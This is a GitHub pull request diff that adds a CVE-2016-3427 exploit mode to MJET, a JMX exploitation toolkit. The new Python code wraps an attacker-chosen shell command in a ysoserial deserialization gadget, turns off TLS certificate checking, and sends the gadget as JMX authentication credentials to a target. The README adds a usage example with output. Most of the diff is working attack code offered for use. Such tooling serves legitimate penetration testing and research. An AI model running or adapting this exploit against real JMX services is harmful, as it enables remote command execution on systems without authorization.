Merge pull request #5 from mogwailabs/cve-2016-3427

JMX authentication deserialization (CVE-2016-3427)
mogwailabs · Jul 8, 2020 · b835a6d · b835a6d
2 parents ded94f6 + 302ef4f
commit b835a6d
Show file tree

Hide file tree

Showing 2 changed files with 76 additions and 1 deletion.
diff --git a/README.md b/README.md
@@ -269,6 +269,28 @@ MJET - MOGWAI LABS JMX Exploitation Toolkit
 
 ```
 
+### Exploit CVE-2016-3427: JMX authentication with Java deserialization
+
+Exploit CVE-2016-3427 with ysoserial:
+The file ysoserial.jar must be present in the MJET/jar directory.
+You can select any ysoserial payload as you like, similar to the original ysoserial calls.
+
+```bash
+$ java -jar jython.jar mjet.py 127.0.0.1 9999 cve-2016-3427 CommonsCollections6 "touch /tmp/xxx"
+
+MJET - MOGWAI LABS JMX Exploitation Toolkit
+===========================================
+[+] Added ysoserial API capacities
+[+] Using JMX RMI
+[+] Connecting to: service:jmx:rmi:///jndi/rmi://127.0.0.1:9999/jmxrmi
+[+] Object was deserialized, target could be vulnerable
+[?]: Returned error:
+(<type 'java.lang.SecurityException'>, java.lang.SecurityException: Authentication failed! Credentials should be String[] instead of java.util.HashSet, <traceback object at 0x2>)
+[+] Done
+```
+
+Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3427
+
 ### Webserver only mode
 
 It is also possible to just run the web server that provides the MLET code and the JAR file with the payload MBean

diff --git a/mjet.py b/mjet.py
@@ -51,7 +51,7 @@ def jmxmp_url(args):
         print "[-] Example: java -cp jython.jar:jars/opendmk_jmxremote_optional_jar-1.0-b01-ea.jar org.python.util.jython mjet.py ..."
         sys.exit(1)
 
-    print "[+] Using opendmk_jmxremote_optional_jar-1.0-b01-ea.jar
+    print "[+] Using opendmk_jmxremote_optional_jar-1.0-b01-ea.jar"
 
     from javax.management.remote import JMXServiceURL
     jmx_url = JMXServiceURL("service:jmx:jmxmp://" +
@@ -435,6 +435,48 @@ def deserializationMode(args):
 
 ### /DESERIALIZATION MODE ###
 
+### cve_2016_3427 MODE ###
+
+def cve_2016_3427Mode(args):
+    if not os.path.isfile('./jars/ysoserial.jar'):
+        print "[-] Error: Did not find ysoserial.jar in jars directory. Please download it from https://github.com/frohoff/ysoserial and move it in the jars directory"
+        sys.exit(1)
+
+    sys.path.append("./jars/ysoserial.jar")
+    print "[+] Added ysoserial API capacities"
+
+    from ysoserial.payloads.ObjectPayload import Utils
+    payload_object = Utils.makePayloadObject(args.gadget, args.cmd)
+
+    trust_managers = array([TrustAllX509TrustManager()], TrustManager)
+
+    sc = SSLContext.getInstance("SSL")
+    sc.init(None, trust_managers, None)
+    SSLContext.setDefault(sc)
+
+    from javax.management.remote import JMXConnector
+    from javax.management.remote import JMXConnectorFactory
+
+    jmx_url = jxmrmi_url(args)
+
+    print "[+] Connecting to: " + str(jmx_url)
+    try:
+        environment = {JMXConnector.CREDENTIALS: payload_object}
+        jmx_connector = JMXConnectorFactory.connect(jmx_url, environment)
+    except:
+        if "java.io.InvalidClassException: filter status: REJECTED" in str(sys.exc_info()):
+            print "[-] Not vulnerable"
+        elif "Credentials should be String[]" in str(sys.exc_info()):
+            print "[+] Object was deserialized, target could be vulnerable"
+
+        print "[?]: Returned error: "
+        print str(sys.exc_info())
+
+    print "[+] Done"
+
+
+### /cve_2016_3427 MODE ###
+
 
 ### Proxy for localhost bypass ###
 
@@ -517,6 +559,9 @@ def arg_webserver_mode(args):
 def arg_deserialization_mode(args):
     deserializationMode(args)
 
+def arg_cve_2016_3427_mode(args):
+    cve_2016_3427Mode(args)
+
 
 # print header
 print ""
@@ -607,6 +652,14 @@ def arg_deserialization_mode(args):
 deserialize_subparser.add_argument('cmd', help='command to be executed')
 deserialize_subparser.set_defaults(func=arg_deserialization_mode)
 
+# CVE-2016-3427 mode
+cve_2016_3427_subparser = subparsers.add_parser(
+    'cve-2016-3427', help='Sends a ysoserial payload to JMX authentication (CVE-2016-3427)')
+cve_2016_3427_subparser.add_argument(
+    'gadget', help='gadget as provided by ysoserial, e.g., CommonsCollections6')
+cve_2016_3427_subparser.add_argument('cmd', help='command to be executed')
+cve_2016_3427_subparser.set_defaults(func=arg_cve_2016_3427_mode)
+
 # Store the user args
 args = parser.parse_args()